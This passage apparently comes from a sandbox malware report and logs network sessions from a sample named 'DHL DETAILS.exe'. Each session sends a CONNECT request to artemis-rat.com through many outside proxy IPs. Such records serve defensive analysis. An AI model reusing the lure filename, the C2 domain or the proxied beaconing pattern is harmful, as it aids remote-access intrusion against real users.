                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.2.550263142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.682044983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.2.55040136.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.686203003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.2.55006213.234.24.11631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.687047958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.565371990 CET65INHTTP/1.1 200 Connection Established
                                                                                    Content-Type: text/plain


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.2.55041236.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.687818050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.2.55041636.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.689342976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.2.55042136.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.690769911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.2.55025374.208.12.35373396352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.693376064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.192447901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.786253929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.958149910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.380155087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.780262947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.177025080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.880100012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177902937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.2.550088119.3.215.4188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.693680048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.2.550111134.209.105.20931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.695553064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.037281036 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    96192.168.2.550294104.25.115.125806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.695882082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.849936008 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    97192.168.2.5501505.135.83.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.697577953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.002902985 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    98192.168.2.550305172.67.182.150806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.702141047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.856511116 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    99192.168.2.550319104.24.136.68806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.723526001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.877782106 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    100192.168.2.550333185.162.229.127806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.726136923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.880336046 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    101192.168.2.55046893.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.737385035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    102192.168.2.550352185.238.228.240806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.740739107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.895232916 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    103192.168.2.55010965.1.40.4710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.741395950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.131427050 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    104192.168.2.55047693.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.741940022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    105192.168.2.55048493.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.744607925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    106192.168.2.55048543.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.744792938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    107192.168.2.550140222.223.103.23273026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.745968103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.103601933 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    108192.168.2.55048643.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.746510983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    109192.168.2.55048843.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.749583006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    110192.168.2.550365172.67.36.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.751393080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.905917883 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    111192.168.2.55049343.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.751641035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    112192.168.2.55049493.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.752095938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    113192.168.2.55029352.73.224.5431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.757103920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.974690914 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    114192.168.2.55050443.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.757337093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
